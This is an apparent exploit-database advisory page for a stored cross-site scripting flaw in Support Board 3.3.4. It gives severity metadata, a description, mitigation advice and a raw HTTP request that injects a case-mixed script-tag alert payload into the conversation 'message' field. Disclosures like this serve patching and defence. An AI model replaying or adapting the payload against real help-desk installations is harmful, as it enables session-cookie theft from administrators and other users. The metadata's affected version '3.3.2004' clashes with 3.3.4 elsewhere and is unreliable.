Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)

vendor:

Support Board

by:

John Jefferson Li

8.8

CVSS

HIGH

Stored Cross-Site Scripting (XSS)

CWE

Product Name: Support Board

Affected Version From: 3.3.2004

Affected Version To: 3.3.2004

Patch Exists: YES

Related CWE:

CPE: 2.3:a:support_board:support_board:3.3.4

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 20.04.2 LTS, Windows 10

2021

Support Board 3.3.4 – ‘Message’ Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability in Support Board 3.3.4 allows an attacker to inject malicious JavaScript code into the 'Message' field of a conversation. This code is then stored in the database and executed when the conversation is viewed by an administrator or other user. The malicious code can be used to steal session cookies, redirect users to malicious websites, or perform other malicious actions.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Support Board.

Source

Exploit-DB raw data:

# Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
# Date: 16/10/2021
# Exploit Author: John Jefferson Li <yiyohwi@naver.com>
# Vendor Homepage: https://board.support/
# Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
# Version: 3.3.4
# Tested on: Ubuntu 20.04.2 LTS, Windows 10

POST /supportboard/include/ajax.php HTTP/1.1
Cookie: [Agent+]
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 808
X-Requested-With: XMLHttpRequest
Connection: close

function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false